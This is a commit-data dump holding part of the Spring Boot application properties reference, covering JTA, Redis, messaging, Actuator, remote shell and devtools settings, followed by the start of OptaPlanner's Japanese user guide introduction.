pool.\n\tspring.jta.bitronix.connectionfactory.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit.\n\tspring.jta.bitronix.connectionfactory.min-pool-size=0 # The minimum size of the pool.\n\tspring.jta.bitronix.connectionfactory.password= # The password to use to connect to the JMS provider.\n\tspring.jta.bitronix.connectionfactory.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction.\n\tspring.jta.bitronix.connectionfactory.test-connections=true # Whether or not connections should be tested when acquired from the pool.\n\tspring.jta.bitronix.connectionfactory.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE).\n\tspring.jta.bitronix.connectionfactory.unique-name=jmsConnectionFactory # The unique name used to identify the resource during recovery.\n\tspring.jta.bitronix.connectionfactory.use-tm-join=true # Whether or not TMJOIN should be used when starting XAResources.\n\tspring.jta.bitronix.connectionfactory.user= # The user to use to connect to the JMS provider.\n\tspring.jta.bitronix.datasource.acquire-increment=1 # Number of connections to create when growing the pool.\n\tspring.jta.bitronix.datasource.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired.\n\tspring.jta.bitronix.datasource.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool.\n\tspring.jta.bitronix.datasource.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions.\n\tspring.jta.bitronix.datasource.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted.\n\tspring.jta.bitronix.datasource.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically.\n\tspring.jta.bitronix.datasource.cursor-holdability= # The default cursor holdability for connections.\n\tspring.jta.bitronix.datasource.defer-connection-release=true # Whether or not the database can run many transactions on the same connection and supports transaction
interleaving.\n\tspring.jta.bitronix.datasource.enable-jdbc4-connection-test= # Whether or not Connection.isValid() is called when acquiring a connection from the pool.\n\tspring.jta.bitronix.datasource.ignore-recovery-failures=false # Whether or not recovery failures should be ignored.\n\tspring.jta.bitronix.datasource.isolation-level= # The default isolation level for connections.\n\tspring.jta.bitronix.datasource.local-auto-commit= # The default auto-commit mode for local transactions.\n\tspring.jta.bitronix.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection.\n\tspring.jta.bitronix.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.bitronix.datasource.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit.\n\tspring.jta.bitronix.datasource.min-pool-size=0 # The minimum size of the pool.\n\tspring.jta.bitronix.datasource.prepared-statement-cache-size=0 # The target size of the prepared statement cache. 0 disables the cache.\n\tspring.jta.bitronix.datasource.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction.\n\tspring.jta.bitronix.datasource.test-query= # SQL query or statement used to validate a connection before returning it.\n\tspring.jta.bitronix.datasource.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE).\n\tspring.jta.bitronix.datasource.unique-name=dataSource # The unique name used to identify the resource during recovery.\n\tspring.jta.bitronix.datasource.use-tm-join=true # Whether or not TMJOIN should be used when starting XAResources.\n\tspring.jta.bitronix.properties.allow-multiple-lrc=false # Allow multiple LRC resources to be enlisted into the same transaction.\n\tspring.jta.bitronix.properties.asynchronous2-pc=false # Enable asynchronous execution of two-phase commit.\n\tspring.jta.bitronix.properties.background-recovery-interval-seconds=60 # Interval in seconds at which to run the recovery process in the background.\n\tspring.jta.bitronix.properties.current-node-only-recovery=true # Recover only the current node.\n\tspring.jta.bitronix.properties.debug-zero-resource-transaction=false # Log the creation and commit call stacks of transactions executed without a single enlisted resource.\n\tspring.jta.bitronix.properties.default-transaction-timeout=60 # Default transaction timeout in seconds.\n\tspring.jta.bitronix.properties.disable-jmx=false # Enable JMX support.\n\tspring.jta.bitronix.properties.exception-analyzer= # Set the fully qualified name of the exception analyzer implementation to use.\n\tspring.jta.bitronix.properties.filter-log-status=false # Enable filtering of logs so that only mandatory logs are written.\n\tspring.jta.bitronix.properties.force-batching-enabled=true # Set if disk forces are batched.\n\tspring.jta.bitronix.properties.forced-write-enabled=true # Set if logs are forced to disk.\n\tspring.jta.bitronix.properties.graceful-shutdown-interval=60 # Maximum amount of seconds the TM will wait for transactions to get done before aborting them at shutdown time.\n\tspring.jta.bitronix.properties.jndi-transaction-synchronization-registry-name= # JNDI name of the TransactionSynchronizationRegistry.\n\tspring.jta.bitronix.properties.jndi-user-transaction-name= # JNDI name of the UserTransaction.\n\tspring.jta.bitronix.properties.journal=disk # Name of the
journal. Can be 'disk', 'null' or a class name.\n\tspring.jta.bitronix.properties.log-part1-filename=btm1.tlog # Name of the first fragment of the journal.\n\tspring.jta.bitronix.properties.log-part2-filename=btm2.tlog # Name of the second fragment of the journal.\n\tspring.jta.bitronix.properties.max-log-size-in-mb=2 # Maximum size in megabytes of the journal fragments.\n\tspring.jta.bitronix.properties.resource-configuration-filename= # ResourceLoader configuration file name.\n\tspring.jta.bitronix.properties.server-id= # ASCII ID that must uniquely identify this TM instance. Defaults to the machine's IP address.\n\tspring.jta.bitronix.properties.skip-corrupted-logs=false # Skip corrupted transactions log entries.\n\tspring.jta.bitronix.properties.warn-about-zero-resource-transaction=true # Log a warning for transactions executed without a single enlisted resource.\n\n\t# EMBEDDED MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/embedded\/EmbeddedMongoProperties.{sc-ext}[EmbeddedMongoProperties])\n\tspring.mongodb.embedded.features=SYNC_DELAY # Comma-separated list of features to enable.\n\tspring.mongodb.embedded.version=2.6.10 # Version of Mongo to use.\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.database=0 # Database index used by the connection factory.\n\tspring.redis.host=localhost # Redis server host.\n\tspring.redis.password= # Login password of the redis server.\n\tspring.redis.pool.max-active=8 # Max number of connections that can be allocated by the pool at a given time. Use a negative value for no limit.\n\tspring.redis.pool.max-idle=8 # Max number of \"idle\" connections in the pool. Use a negative value to indicate an unlimited number of idle connections.\n\tspring.redis.pool.max-wait=-1 # Maximum amount of time (in milliseconds) a connection allocation should block before throwing an exception when the pool is exhausted. Use a negative value to block indefinitely.\n\tspring.redis.pool.min-idle=0 # Target for the minimum number of idle connections to maintain in the pool. This setting only has an effect if it is positive.\n\tspring.redis.port=6379 # Redis server port.\n\tspring.redis.sentinel.master= # Name of the Redis server.\n\tspring.redis.sentinel.nodes= # Comma-separated list of host:port pairs.\n\tspring.redis.timeout=0 # Connection timeout in milliseconds.\n\n\n\t# ----------------------------------------\n\t# INTEGRATION PROPERTIES\n\t# ----------------------------------------\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url= # URL of the ActiveMQ broker. Auto-generated by default. For instance `tcp:\/\/localhost:61616`\n\tspring.activemq.in-memory=true # Specify if the default broker URL should be in memory. Ignored if an explicit broker has been specified.\n\tspring.activemq.password= # Login password of the broker.\n\tspring.activemq.pooled=false # Specify if a PooledConnectionFactory should be created instead of a regular ConnectionFactory.\n\tspring.activemq.user= # Login user of the broker.\n\n\t# ARTEMIS ({sc-spring-boot-autoconfigure}\/jms\/artemis\/ArtemisProperties.{sc-ext}[ArtemisProperties])\n\tspring.artemis.embedded.cluster-password= # Cluster password. Randomly generated on startup by default.\n\tspring.artemis.embedded.data-directory= # Journal file directory.
Not necessary if persistence is turned off.\n\tspring.artemis.embedded.enabled=true # Enable embedded mode if the Artemis server APIs are available.\n\tspring.artemis.embedded.persistent=false # Enable persistent store.\n\tspring.artemis.embedded.queues= # Comma-separated list of queues to create on startup.\n\tspring.artemis.embedded.server-id= # Server id. By default, an auto-incremented counter is used.\n\tspring.artemis.embedded.topics= # Comma-separated list of topics to create on startup.\n\tspring.artemis.host=localhost # Artemis broker host.\n\tspring.artemis.mode= # Artemis deployment mode, auto-detected by default. Can be explicitly set to \"native\" or \"embedded\".\n\tspring.artemis.port=61616 # Artemis broker port.\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchProperties.{sc-ext}[BatchProperties])\n\tspring.batch.initializer.enabled=true # Create the required batch tables on startup if necessary.\n\tspring.batch.job.enabled=true # Execute all Spring Batch jobs in the context on startup.\n\tspring.batch.job.names= # Comma-separated list of job names to execute on startup (For instance `job1,job2`). By default, all Jobs found in the context are executed.\n\tspring.batch.schema=classpath:org\/springframework\/batch\/core\/schema-@@platform@@.sql # Path to the SQL file to use to initialize the database schema.\n\tspring.batch.table-prefix= # Table prefix for all the batch meta-data tables.\n\n\t# HORNETQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.embedded.cluster-password= # Cluster password. Randomly generated on startup by default.\n\tspring.hornetq.embedded.data-directory= # Journal file directory. Not necessary if persistence is turned off.\n\tspring.hornetq.embedded.enabled=true # Enable embedded mode if the HornetQ server APIs are available.\n\tspring.hornetq.embedded.persistent=false # Enable persistent store.\n\tspring.hornetq.embedded.queues= # Comma-separated list of queues to create on startup.\n\tspring.hornetq.embedded.server-id= # Server id. By default, an auto-incremented counter is used.\n\tspring.hornetq.embedded.topics= # Comma-separated list of topics to create on startup.\n\tspring.hornetq.host=localhost # HornetQ broker host.\n\tspring.hornetq.mode= # HornetQ deployment mode, auto-detected by default. Can be explicitly set to \"native\" or \"embedded\".\n\tspring.hornetq.port=5445 # HornetQ broker port.\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.jndi-name= # Connection factory JNDI name. When set, takes precedence over other connection factory auto-configurations.\n\tspring.jms.listener.acknowledge-mode= # Acknowledge mode of the container.
By default, the listener is transacted with automatic acknowledgment.\n\tspring.jms.listener.auto-startup=true # Start the container automatically on startup.\n\tspring.jms.listener.concurrency= # Minimum number of concurrent consumers.\n\tspring.jms.listener.max-concurrency= # Maximum number of concurrent consumers.\n\tspring.jms.pub-sub-domain=false # Specify if the default destination type is topic.\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.addresses= # Comma-separated list of addresses to which the client should connect.\n\tspring.rabbitmq.dynamic=true # Create an AmqpAdmin bean.\n\tspring.rabbitmq.host=localhost # RabbitMQ host.\n\tspring.rabbitmq.listener.acknowledge-mode= # Acknowledge mode of container.\n\tspring.rabbitmq.listener.auto-startup=true # Start the container automatically on startup.\n\tspring.rabbitmq.listener.concurrency= # Minimum number of consumers.\n\tspring.rabbitmq.listener.max-concurrency= # Maximum number of consumers.\n\tspring.rabbitmq.listener.prefetch= # Number of messages to be handled in a single request. It should be greater than or equal to the transaction size (if used).\n\tspring.rabbitmq.listener.transaction-size= # Number of messages to be processed in a transaction. For best results it should be less than or equal to the prefetch count.\n\tspring.rabbitmq.password= # Login to authenticate against the broker.\n\tspring.rabbitmq.port=5672 # RabbitMQ port.\n\tspring.rabbitmq.requested-heartbeat= # Requested heartbeat timeout, in seconds; zero for none.\n\tspring.rabbitmq.ssl.enabled=false # Enable SSL support.\n\tspring.rabbitmq.ssl.key-store= # Path to the key store that holds the SSL certificate.\n\tspring.rabbitmq.ssl.key-store-password= # Password used to access the key store.\n\tspring.rabbitmq.ssl.trust-store= # Trust store that holds SSL certificates.\n\tspring.rabbitmq.ssl.trust-store-password= # Password used to access the trust store.\n\tspring.rabbitmq.username= # Login user to authenticate to the broker.\n\tspring.rabbitmq.virtual-host= # Virtual host to use when connecting to the broker.\n\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.enabled=true # Enable endpoints.\n\tendpoints.sensitive= # Default endpoint sensitive setting.\n\tendpoints.actuator.enabled=true # Enable the endpoint.\n\tendpoints.actuator.path= # Endpoint URL path.\n\tendpoints.actuator.sensitive=false # Enable security on the endpoint.\n\tendpoints.autoconfig.enabled= # Enable the endpoint.\n\tendpoints.autoconfig.id= # Endpoint identifier.\n\tendpoints.autoconfig.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.beans.enabled= # Enable the endpoint.\n\tendpoints.beans.id= # Endpoint identifier.\n\tendpoints.beans.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.configprops.enabled= # Enable the endpoint.\n\tendpoints.configprops.id= # Endpoint identifier.\n\tendpoints.configprops.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # Keys that should be sanitized.
Keys can be simple strings that the property ends with or regex expressions.\n\tendpoints.configprops.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.docs.curies.enabled=false # Enable the curie generation.\n\tendpoints.docs.enabled=true # Enable actuator docs endpoint.\n\tendpoints.docs.path=\/docs #\n\tendpoints.docs.sensitive=false #\n\tendpoints.dump.enabled= # Enable the endpoint.\n\tendpoints.dump.id= # Endpoint identifier.\n\tendpoints.dump.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.env.enabled= # Enable the endpoint.\n\tendpoints.env.id= # Endpoint identifier.\n\tendpoints.env.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # Keys that should be sanitized. Keys can be simple strings that the property ends with or regex expressions.\n\tendpoints.env.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.flyway.enabled= # Enable the endpoint.\n\tendpoints.flyway.id= # Endpoint identifier.\n\tendpoints.flyway.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.health.enabled= # Enable the endpoint.\n\tendpoints.health.id= # Endpoint identifier.\n\tendpoints.health.mapping.*= # Mapping of health statuses to HttpStatus codes. By default, registered health statuses map to sensible defaults (i.e. UP maps to 200).\n\tendpoints.health.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.health.time-to-live=1000 # Time to live for cached result, in milliseconds.\n\tendpoints.info.enabled= # Enable the endpoint.\n\tendpoints.info.id= # Endpoint identifier.\n\tendpoints.info.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.jolokia.enabled=true # Enable Jolokia endpoint.\n\tendpoints.jolokia.path=\/jolokia # Endpoint URL path.\n\tendpoints.jolokia.sensitive=true # Enable security on the endpoint.\n\tendpoints.liquibase.enabled= # Enable the endpoint.\n\tendpoints.liquibase.id= # Endpoint identifier.\n\tendpoints.liquibase.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.logfile.enabled=true # Enable the endpoint.\n\tendpoints.logfile.path=\/logfile # Endpoint URL path.\n\tendpoints.logfile.sensitive=true # Enable security on the endpoint.\n\tendpoints.mappings.enabled= # Enable the endpoint.\n\tendpoints.mappings.id= # Endpoint identifier.\n\tendpoints.mappings.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.metrics.enabled= # Enable the endpoint.\n\tendpoints.metrics.filter.enabled=true # Enable the metrics servlet filter.\n\tendpoints.metrics.id= # Endpoint identifier.\n\tendpoints.metrics.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.shutdown.enabled= # Enable the endpoint.\n\tendpoints.shutdown.id= # Endpoint identifier.\n\tendpoints.shutdown.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.trace.enabled= # Enable the endpoint.\n\tendpoints.trace.id= # Endpoint identifier.\n\tendpoints.trace.sensitive= # Mark if the endpoint exposes sensitive information.\n\n\t# ENDPOINTS CORS CONFIGURATION ({sc-spring-boot-actuator}\/autoconfigure\/EndpointCorsProperties.{sc-ext}[EndpointCorsProperties])\n\tendpoints.cors.allow-credentials= # Set whether credentials are supported. When not set, credentials are not supported.\n\tendpoints.cors.allowed-headers= # Comma-separated list of headers to allow in a request. 
'*' allows all headers.\n\tendpoints.cors.allowed-methods=GET # Comma-separated list of methods to allow. '*' allows all methods.\n\tendpoints.cors.allowed-origins= # Comma-separated list of origins to allow. '*' allows all origins. When not set, CORS support is disabled.\n\tendpoints.cors.exposed-headers= # Comma-separated list of headers to include in a response.\n\tendpoints.cors.max-age=1800 # How long, in seconds, the response from a pre-flight request can be cached by clients.\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.domain= # JMX domain name. Initialized with the value of 'spring.jmx.default-domain' if set.\n\tendpoints.jmx.enabled=true # Enable JMX export of all endpoints.\n\tendpoints.jmx.static-names= # Additional static properties to append to all ObjectNames of MBeans representing Endpoints.\n\tendpoints.jmx.unique-names=false # Ensure that ObjectNames are modified in case of conflict.\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.add-application-context-header=true # Add the \"X-Application-Context\" HTTP header in each response.\n\tmanagement.address= # Network address that the management endpoints should bind to.\n\tmanagement.context-path= # Management endpoint context-path. For instance `\/actuator`\n\tmanagement.port= # Management endpoint HTTP port. Use the same port as the application by default.\n\tmanagement.security.enabled=true # Enable security.\n\tmanagement.security.role=ADMIN # Role required to access the management endpoint.\n\tmanagement.security.sessions=stateless # Session creating policy to use (always, never, if_required, stateless).\n\n\t# HEALTH INDICATORS (previously health.*)\n\tmanagement.health.db.enabled=true # Enable database health check.\n\tmanagement.health.defaults.enabled=true # Enable default health indicators.\n\tmanagement.health.diskspace.enabled=true # Enable disk space health check.\n\tmanagement.health.diskspace.path= # Path used to compute the available disk space.\n\tmanagement.health.diskspace.threshold=0 # Minimum disk space that should be available, in bytes.\n\tmanagement.health.elasticsearch.enabled=true # Enable elasticsearch health check.\n\tmanagement.health.elasticsearch.indices= # Comma-separated index names.\n\tmanagement.health.elasticsearch.response-timeout=100 # The time, in milliseconds, to wait for a response from the cluster.\n\tmanagement.health.jms.enabled=true # Enable JMS health check.\n\tmanagement.health.mail.enabled=true # Enable Mail health check.\n\tmanagement.health.mongo.enabled=true # Enable MongoDB health check.\n\tmanagement.health.rabbit.enabled=true # Enable RabbitMQ health check.\n\tmanagement.health.redis.enabled=true # Enable Redis health check.\n\tmanagement.health.solr.enabled=true # Enable Solr health check.\n\tmanagement.health.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP # Comma-separated list of health statuses in order of severity.\n\n\t# TRACING ({sc-spring-boot-actuator}\/trace\/TraceProperties.{sc-ext}[TraceProperties])\n\tmanagement.trace.include=request-headers,response-headers,errors # Items to be included in the trace.\n\n\t# REMOTE SHELL\n\tshell.auth=simple # Authentication type.
Auto-detected according to the environment.\n\tshell.auth.jaas.domain=my-domain # JAAS domain.\n\tshell.auth.key.path= # Path to the authentication key. This should point to a valid \".pem\" file.\n\tshell.auth.simple.user.name=user # Login user.\n\tshell.auth.simple.user.password= # Login password.\n\tshell.auth.spring.roles=ADMIN # Comma-separated list of required roles to login to the CRaSH console.\n\tshell.command-path-patterns=classpath*:\/commands\/**,classpath*:\/crash\/commands\/** # Patterns to use to look for commands.\n\tshell.command-refresh-interval=-1 # Scan for changes and update the command if necessary (in seconds).\n\tshell.config-path-patterns=classpath*:\/crash\/* # Patterns to use to look for configurations.\n\tshell.disabled-commands=jpa*,jdbc*,jndi* # Comma-separated list of commands to disable.\n\tshell.disabled-plugins= # Comma-separated list of plugins to disable. Certain plugins are disabled by default based on the environment.\n\tshell.ssh.auth-timeout= # Number of milliseconds after which the user will be prompted to login again.\n\tshell.ssh.enabled=true # Enable CRaSH SSH support.\n\tshell.ssh.idle-timeout= # Number of milliseconds after which unused connections are closed.\n\tshell.ssh.key-path= # Path to the SSH server key.\n\tshell.ssh.port=2000 # SSH port.\n\tshell.telnet.enabled=false # Enable CRaSH telnet support. Enabled by default if the TelnetPlugin is available.\n\tshell.telnet.port=5000 # Telnet port.\n\n\t# GIT INFO\n\tspring.git.properties= # Resource reference to a generated git info properties file.\n\n\t# METRICS EXPORT ({sc-spring-boot-actuator}\/metrics\/export\/MetricExportProperties.{sc-ext}[MetricExportProperties])\n\tspring.metrics.export.aggregate.key-pattern= # Pattern that tells the aggregator what to do with the keys from the source repository.\n\tspring.metrics.export.aggregate.prefix= # Prefix for global repository if active.\n\tspring.metrics.export.delay-millis=5000 # Delay in milliseconds between export ticks. Metrics are exported to external sources on a schedule with this delay.\n\tspring.metrics.export.enabled=true # Flag to enable metric export (assuming a MetricWriter is available).\n\tspring.metrics.export.excludes= # List of patterns for metric names to exclude.
Applied after the includes.\n\tspring.metrics.export.includes= # List of patterns for metric names to include.\n\tspring.metrics.export.redis.key=keys.spring.metrics # Key for redis repository export (if active).\n\tspring.metrics.export.redis.prefix=spring.metrics # Prefix for redis repository if active.\n\tspring.metrics.export.send-latest= # Flag to switch off any available optimizations based on not exporting unchanged metric values.\n\tspring.metrics.export.statsd.host= # Host of a statsd server to receive exported metrics.\n\tspring.metrics.export.statsd.port=8125 # Port of a statsd server to receive exported metrics.\n\tspring.metrics.export.statsd.prefix= # Prefix for statsd exported metrics.\n\tspring.metrics.export.triggers.*= # Specific trigger properties per MetricWriter bean name.\n\n\n\t# ----------------------------------------\n\t# DEVTOOLS PROPERTIES\n\t# ----------------------------------------\n\n\t# DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/DevToolsProperties.{sc-ext}[DevToolsProperties])\n\tspring.devtools.livereload.enabled=true # Enable a livereload.com compatible server.\n\tspring.devtools.livereload.port=35729 # Server port.\n\tspring.devtools.restart.additional-exclude= # Additional patterns that should be excluded from triggering a full restart.\n\tspring.devtools.restart.additional-paths= # Additional paths to watch for changes.\n\tspring.devtools.restart.enabled=true # Enable automatic restart.\n\tspring.devtools.restart.exclude=META-INF\/maven\/**,META-INF\/resources\/**,resources\/**,static\/**,public\/**,templates\/**,**\/*Test.class,**\/*Tests.class,git.properties # Patterns that should be excluded from triggering a full restart.\n\tspring.devtools.restart.poll-interval=1000 # Amount of time (in milliseconds) to wait between polling for classpath changes.\n\tspring.devtools.restart.quiet-period=400 # Amount of quiet time (in milliseconds) required without any classpath changes before a restart is triggered.\n\tspring.devtools.restart.trigger-file= # Name of a specific file that, when changed, will trigger the restart check. If not specified, any classpath file change will trigger the restart.\n\n\t# REMOTE DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/RemoteDevToolsProperties.{sc-ext}[RemoteDevToolsProperties])\n\tspring.devtools.remote.context-path=\/.~~spring-boot!~ # Context path used to handle the remote connection.\n\tspring.devtools.remote.debug.enabled=true # Enable remote debug support.\n\tspring.devtools.remote.debug.local-port=8000 # Local remote debug server port.\n\tspring.devtools.remote.proxy.host= # The host of the proxy to use to connect to the remote application.\n\tspring.devtools.remote.proxy.port= # The port of the proxy to use to connect to the remote application.\n\tspring.devtools.remote.restart.enabled=true # Enable remote restart.\n\tspring.devtools.remote.secret= # A shared secret required to establish a connection (required to enable remote support).\n\tspring.devtools.remote.secret-header-name=X-AUTH-TOKEN # HTTP header used to transfer the shared secret.\n\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cdd19ccb86c18ebd75cb87f27acd075b782d64da","subject":"fix 404 on japanese image","message":"fix 404 on japanese image\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"localized\/ja\/UserGuide-chapter1.adoc","new_file":"localized\/ja\/UserGuide-chapter1.adoc","new_contents":"= Chapter 1.
OptaPlanner Introduction\n:awestruct-description: Chapter 1. OptaPlanner Introduction\n:awestruct-layout: localizedBase\n:awestruct-lang: ja\n:awestruct-priority: 1.0\n:showtitle:\n\n\n\nxref:whatIsOptaPlanner[1.1. What is OptaPlanner?]:: \nxref:requirements[1.2. Requirements]:: \nxref:whatIsAPlanningProblem[1.3. What is a planning problem?]:: \nxref:aPlanningProblemIsNPCompleteOrNPHard[1.3.1. A planning problem is NP-complete or NP-hard]::: \nxref:aPlanningProblemHasConstraints[1.3.2. A planning problem has (hard and soft) constraints]::: \nxref:aPlanningProblemHasAHugeSearchSpace[1.3.3. A planning problem has a huge search space]::: \nxref:downloadAndRunTheExamples[1.4. Download and run the examples]:: \nxref:getTheReleaseZipAndRunTheExamples[1.4.1. Get the release .zip and run the examples]::: \nxref:runTheExamplesInAnIDE[1.4.2. Run the examples in an IDE (IntelliJ, Eclipse, NetBeans)]::: \nxref:useWithMavenGradleEtc[1.4.3. Use OptaPlanner with Maven, Gradle, Ivy, Buildr or ANT]::: \nxref:buildFromSource[1.4.4. Build OptaPlanner from source]::: \nxref:governance[1.5. Governance]:: \nxref:statusOfOptaPlanner[1.5.1. Status of OptaPlanner]::: \nxref:backwardsCompatibility[1.5.2. Backwards compatibility]::: \nxref:communityAndSupport[1.5.3. Community and support]::: \nxref:relationshipWithKie[1.5.4.
Relationship with Drools and jBPM]::: \n\n[]\n[[whatIsOptaPlanner]]\n== 1.1 What is OptaPlanner?\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/optaPlannerLogo.png[]\n\n*link:https:\/\/www.optaplanner.org\/[OptaPlanner] is an embeddable, lightweight constraint satisfaction engine that obtains optimized solutions for planning problems.* It solves use cases such as the following:\n\n* *Employee shift rostering:* timetabling nurses, repairmen and so on\n* *Agenda scheduling:* scheduling meetings, facilities, maintenance jobs, advertisements and so on\n* *Educational timetabling:* scheduling lessons, courses, exams, conference presentations and so on\n* *Vehicle routing:* planning vehicles (trucks, trains, boats, airplanes and so on) carrying freight and\/or people\n* *Bin packing:* filling containers, trucks and ships, storing goods in warehouses, and even assigning cloud computer nodes\n* *Job shop scheduling:* planning car assembly lines, machine queues, workforce tasks and so on\n* *Cutting stock:* minimizing the waste that results from cutting paper, steel, carpet and so on\n* *Sport scheduling:* planning the league games of football, baseball and so on\n* *Financial optimization:* investment portfolio optimization, risk spreading and so on\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/useCaseOverview.png[]\n\nEvery organization faces planning problems: products and services are provided with a limited set of _constrained_ resources (employees, assets, time and
money). By optimizing such planning, OptaPlanner enables organizations to do more business with less resources. This is known as _Constraint Satisfaction Programming_, which is part of the _Operations Research_ discipline.\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/whatIsAPlanningProblem.png[]\n\nWith the help of OptaPlanner, even normal Java(TM) programmers can solve constraint satisfaction problems efficiently. Under the hood, OptaPlanner combines optimization heuristics and metaheuristics with very efficient score calculation.
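\n\nFor a first impression, the typical entry point looks roughly like this minimal sketch. It assumes the 6.x +Solver+ API and the +nqueensSolverConfig.xml+ resource that ships with the examples; +planningProblem+ stands for a dataset loaded elsewhere.\n\n----\nSolverFactory solverFactory = SolverFactory.createFromXmlResource(\n        \"org\/optaplanner\/examples\/nqueens\/solver\/nqueensSolverConfig.xml\");\nSolver solver = solverFactory.buildSolver();\n\/\/ Runs until the termination configured in the XML is reached.\nsolver.solve(planningProblem);\nNQueens bestSolution = (NQueens) solver.getBestSolution();\n----\n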
\n\n\n[[requirements]]\n== 1.2. Requirements\n\nOptaPlanner is _open source software_, released under link:http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[the Apache Software License 2.0]. This license is very liberal and allows reuse for commercial purposes. Read link:http:\/\/www.apache.org\/foundation\/license-faq.html#WhatDoesItMEAN[the layman's explanation].\n\nOptaPlanner is 100% pure Java(TM) and runs on any JVM of version 1.6 or higher. It xref:integration[integrates very easily] with other Java(TM) technologies. OptaPlanner is available in xref:useWithMavenGradleEtc[the Maven Central Repository].\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/compatibility.png[]\n\n\n\n[[whatIsAPlanningProblem]]\n== 1.3. What is a planning problem?\n\n[[aPlanningProblemIsNPCompleteOrNPHard]]\n=== 1.3.1. A planning problem is NP-complete or NP-hard\n\nAll of the use cases above are _probably_ link:http:\/\/en.wikipedia.org\/wiki\/NP-complete[NP-complete] or harder. In layman's terms, NP-complete means:\n\n* It is easy to verify a given solution to a problem in reasonable time.\n* There is no silver bullet to find the optimal solution of a problem in reasonable time (*).\n\n.Note\n****\n(*) At least, none of the smartest computer scientists in the world have found such a silver bullet yet. But if someone were to find one for a single NP-complete problem, it would apply to every NP-complete problem.\nIn fact, there is a $1,000,000 reward for anyone who proves link:http:\/\/en.wikipedia.org\/wiki\/P_%3D_NP_problem[whether such a silver bullet actually exists or not].\n****\n\nThe implication of this is pretty dire: solving your problem is probably harder than you anticipated, because the following two common techniques will not suffice:\n\n* A brute force algorithm (even a smarter variant) takes too long.\n* A quick algorithm, such as the _put the largest items in first_ algorithm in bin packing, returns a solution that is far from optimal.\n\n*By using advanced optimization algorithms, OptaPlanner finds a good solution in reasonable time for such planning problems.*\n\n\n\n[[aPlanningProblemHasConstraints]]\n=== 1.3.2.
